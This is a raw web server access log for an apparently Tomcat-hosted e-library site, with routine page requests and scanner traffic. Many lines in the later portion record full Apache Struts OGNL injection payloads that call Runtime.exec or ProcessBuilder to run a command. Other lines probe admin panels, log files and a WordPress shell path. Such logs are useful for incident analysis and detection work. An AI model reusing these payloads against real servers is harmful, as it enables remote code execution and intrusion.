127.0.0.1 - - [16/Jan/2024:00:14:05 -0500] "GET /wp-content/plugins/fix/up.php HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:00:16:03 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:00:16:03 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:00:16:08 -0500] "GET /logs/catalina.2023-06-09.log HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:00:24:30 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:00:24:30 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:00:27:35 -0500] "GET /logs/localhost_access_log..2022-12-18.txt HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:00:28:51 -0500] "GET /work/Catalina/localhost/wrapper-interface/?C=D;O=D HTTP/1.1" 200 2145
152.32.212.149 - - [16/Jan/2024:00:45:15 -0500] "GET / HTTP/1.1" 302 -
152.32.212.149 - - [16/Jan/2024:00:45:17 -0500] " î  ê`œfŠâØ–} @Ù»¾Eà’îÃ|4ò&ƒgcÐœÝ% ÈgPïv+Û”+xš@~i¿•×·¼w5ÉL ±jC &À+À/À,À0Ì©Ì¨À ÀÀ" 400 -
152.32.212.149 - - [16/Jan/2024:00:45:17 -0500] "t3 12.1.2 " 400 -
165.154.172.88 - - [16/Jan/2024:00:52:03 -0500] "GET / HTTP/1.1" 302 -
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /favicon.ico HTTP/1.1" 302 -
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /login HTTP/1.1" 200 4254
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /login/sitemap.xml HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /login/robots.txt HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /login HTTP/1.1" 200 4254
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /images/favicon.ico HTTP/1.1" 200 1150
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /login/images/Pocket_textbooks_LOGO.png HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /login/sitemap.xml HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:04 -0500] "GET /login/robots.txt HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:05 -0500] "GET /axis2-admin/ HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:05 -0500] "GET /axis2/ HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:05 -0500] "GET /axis2/axis2-admin/ HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:05 -0500] "GET /?id=%25{{{11}}*{{11}}} HTTP/1.1" 302 -
165.154.172.88 - - [16/Jan/2024:00:52:05 -0500] "GET /login HTTP/1.1" 200 4254
165.154.172.88 - - [16/Jan/2024:00:52:05 -0500] "GET /struts/webconsole.html HTTP/1.1" 200 2145
165.154.172.88 - - [16/Jan/2024:00:52:05 -0500] "GET /?actionErrors=1111 HTTP/1.1" 302 -
165.154.172.88 - - [16/Jan/2024:00:52:06 -0500] "GET /login HTTP/1.1" 200 4254
165.154.172.88 - - [16/Jan/2024:00:52:06 -0500] "GET /invoker/readonly HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:00:55:01 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:00:55:01 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:00:55:02 -0500] "GET /images/CSG%20elibrary%20Logo.png HTTP/1.1" 404 990
127.0.0.1 - - [16/Jan/2024:00:55:02 -0500] "GET /css/new-style.css HTTP/1.1" 200 5564
127.0.0.1 - - [16/Jan/2024:00:55:02 -0500] "GET /images/Pocket_textbooks_LOGO.png HTTP/1.1" 200 69538
127.0.0.1 - - [16/Jan/2024:00:55:02 -0500] "GET /images/eLibrary%20Pro%20Logo%20-%20Powered%20by%203.png HTTP/1.1" 200 213908
127.0.0.1 - - [16/Jan/2024:00:55:02 -0500] "GET /images/bg.png HTTP/1.1" 200 166566
127.0.0.1 - - [16/Jan/2024:00:55:02 -0500] "GET /fonts/opensans-regular-webfont.woff2 HTTP/1.1" 404 990
127.0.0.1 - - [16/Jan/2024:00:55:02 -0500] "GET /fonts/opensans-regular-webfont.woff HTTP/1.1" 404 990
127.0.0.1 - - [16/Jan/2024:00:55:03 -0500] "GET /fonts/opensans-regular-webfont.ttf HTTP/1.1" 404 990
127.0.0.1 - - [16/Jan/2024:00:56:14 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:00:56:15 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:01:00:02 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:03 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:04 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:04 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:05 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:05 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:06 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:06 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:07 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:07 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:08 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:08 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:09 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:09 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:10 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:10 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:11 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:12 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:13 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:13 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:14 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:14 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:15 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:15 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:16 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:16 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:17 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:17 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:00:18 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:01:00:18 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 84
127.0.0.1 - - [16/Jan/2024:01:21:12 -0500] "GET /lib?C=D%3BO%3DA HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:01:21:16 -0500] "GET /login HTTP/1.1" 200 4254
198.235.24.123 - - [16/Jan/2024:01:36:54 -0500] " î  ê’€ï“ô Z6erUf}7@*«±™5Þ½¨R][[#C ï—mÀXçxæí¸–òìJ5ÇC× ç¾é‰Öù &À+À/À,À0Ì©Ì¨À	ÀÀ" 400 -
198.235.24.123 - - [16/Jan/2024:01:36:55 -0500] "-" 400 -
127.0.0.1 - - [16/Jan/2024:02:00:22 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:00:26 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:02:04:42 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:09:23 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:12:45 -0500] "HEAD / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:12:45 -0500] "HEAD /login HTTP/1.1" 200 -
127.0.0.1 - - [16/Jan/2024:02:13:39 -0500] "GET / HTTP/1.1" 302 -
193.42.62.221 - - [16/Jan/2024:02:17:53 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:18:21 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:18:21 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:02:18:21 -0500] "GET /bin/GED%20L2%20Mathematics%20studentv4.pdf HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:02:18:23 -0500] "GET /bin/css/bootstrap.min.css HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:02:18:23 -0500] "GET /bin/js/bootstrap.min.js HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:02:18:23 -0500] "GET /bin/js/jquery.min.js HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:02:20:11 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:25:57 -0500] "GET /temp/ehcache_auto_created1414017026508013800diskstore/ HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:02:48:27 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:02:48:27 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:02:48:27 -0500] "GET /webapps/tomcat/META-INF/ HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:02:48:29 -0500] "GET /webapps/tomcat/META-INF/js/jquery.min.js HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:06:39 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:06:39 -0500] "GET / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:25:29 -0500] "POST /getToken HTTP/1.1" 200 24
127.0.0.1 - - [16/Jan/2024:03:25:30 -0500] "POST /pdf-manager/updateUserRest HTTP/1.1" 200 77
127.0.0.1 - - [16/Jan/2024:03:42:50 -0500] "GET /robots.txt HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:42:50 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:42:59 -0500] "GET /webapps/docs/ssl-howto.html HTTP/1.1" 200 2145
127.0.0.1 - - [16/Jan/2024:03:52:19 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:19 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:20 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:20 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:20 -0500] "GET /?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:20 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:21 -0500] "GET /?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:21 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:21 -0500] "GET /?%28%27%5Cu0023context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5Cu003dfalse%27%29%28bla%29%28bla%29&%28%27%5Cu0023_memberAccess.excludeProperties%5Cu003d@java.util.Collections@EMPTY_SET%27%29%28kxlzx%29%28kxlzx%29&%28%27%5Cu0023_memberAccess.allowStaticMethodAccess%5Cu003dtrue%27%29%28bla%29%28bla%29&%28%27%5Cu0023mycmd%5Cu003d%5C%27echo%20ccvaevcc%5C%27%27%29%28bla%29%28bla%29&%28%27%5Cu0023myret%5Cu003d@java.lang.Runtime@getRuntime%28%29.exec%28%5Cu0023mycmd%29%27%29%28bla%29%28bla%29&%28A%29%28%28%27%5Cu0023mydat%5Cu003dnew%5C40java.io.DataInputStream%28%5Cu0023myret.getInputStream%28%29%29%27%29%28bla%29%29&%28B%29%28%28%27%5Cu0023myres%5Cu003dnew%5C40byte%5B51020%5D%27%29%28bla%29%29&%28C%29%28%28%27%5Cu0023mydat.readFully%28%5Cu0023myres%29%27%29%28bla%29%29&%28D%29%28%28%27%5Cu0023mystr%5Cu003dnew%5C40java.lang.String%28%5Cu0023myres%29%27%29%28bla%29%29&%28%27%5Cu0023myout%5Cu003d@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28bla%29%28bla%29&%28E%29%28%28%27%5Cu0023myout.getWriter%28%29.println%28%5Cu0023mystr%29%27%29%28bla%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:21 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:22 -0500] "GET /?%28%27%5C43_memberAccess.allowStaticMethodAccess%27%29%28a%29=true&%28b%29%28%28%27%5C43context%5B%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27%5D%5C75false%27%29%28b%29%29&%28%27%5C43c%27%29%28%28%27%5C43_memberAccess.excludeProperties%5C75@java.util.Collections@EMPTY_SET%27%29%28c%29%29&%28g%29%28%28%27%5C43mycmd%5C75%5C%27echo%20ccvaevcc%5C%27%27%29%28d%29%29&%28h%29%28%28%27%5C43myret%5C75@java.lang.Runtime@getRuntime%28%29.exec%28%5C43mycmd%29%27%29%28d%29%29&%28i%29%28%28%27%5C43mydat%5C75new%5C40java.io.DataInputStream%28%5C43myret.getInputStream%28%29%29%27%29%28d%29%29&%28j%29%28%28%27%5C43myres%5C75new%5C40byte%5B51020%5D%27%29%28d%29%29&%28k%29%28%28%27%5C43mydat.readFully%28%5C43myres%29%27%29%28d%29%29&%28l%29%28%28%27%5C43mystr%5C75new%5C40java.lang.String%28%5C43myres%29%27%29%28d%29%29&%28m%29%28%28%27%5C43myout%5C75@org.apache.struts2.ServletActionContext@getResponse%28%29%27%29%28d%29%29&%28n%29%28%28%27%5C43myout.getWriter%28%29.println%28%5C43mystr%29%27%29%28d%29%29 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:22 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:22 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:22 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:23 -0500] "GET /devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:23 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:23 -0500] "GET /devmode.action?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27echo%20ccvaevcc%27%29.getInputStream%28%29%29) HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:24 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:24 -0500] "GET /&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:25 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:25 -0500] "GET /&key=(%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D=+new+java.lang.Boolean(false),+%23_memberAccess%5B%22allowStaticMethodAccess%22%5D=true,+%23a=@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char%5B51020%5D,%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z%5B(key)('meh')%5D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:25 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:25 -0500] "GET /%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:26 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:26 -0500] "GET /%25%7B%23a=(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22,%22ccvaevcc%22%7D)).redirectErrorStream(true).start(),%23b=%23a.getInputStream(),%23c=new%20java.io.InputStreamReader(%23b),%23d=new%20java.io.BufferedReader(%23c),%23e=new%20char%5B50000%5D,%23d.read(%23e),%23f=%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22),%23f.getWriter().println(new%20java.lang.String(%23e)),%23f.getWriter().flush(),%23f.getWriter().close()%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:26 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:26 -0500] "GET /?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:27 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:27 -0500] "GET /?x=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('echo%20ccvaevcc').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:27 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:27 -0500] "GET /$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:28 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:28 -0500] "GET /$%7B%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D=false,%23m=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23m.setAccessible(true),%23m.set(%23_memberAccess,true),%23q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo%20ccvaevcc').getInputStream()),%23q%7D.action HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:28 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:28 -0500] "GET /?redirect%3A%24%7B4289038%2B4815400%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:29 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:29 -0500] "GET /?redirect%3A%24%7B4289038%2B4815400%7D HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:29 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:30 -0500] "GET /?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:30 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:30 -0500] "GET /?debug=command&expression=%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B%22echo%22%2C%22ccvaevcc%22%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close() HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:30 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:31 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:31 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:31 -0500] "POST / HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:31 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:32 -0500] "GET /?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:32 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:32 -0500] "GET /?method:%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context%5B%23parameters.obj%5B0%5D%5D.getWriter().print(%23parameters.content%5B0%5D%2B602%2B53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:33 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:34 -0500] "GET /%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 302 -
127.0.0.1 - - [16/Jan/2024:03:52:34 -0500] "GET /login HTTP/1.1" 200 4254
127.0.0.1 - - [16/Jan/2024:03:52:34 -0500] "GET /%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr=%23context%5B%23parameters.obj%5B0%5D%5D.getWriter(),%23wr.print(%23parameters.content%5B0%5D+602+53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086 HTTP/1.1" 302 -
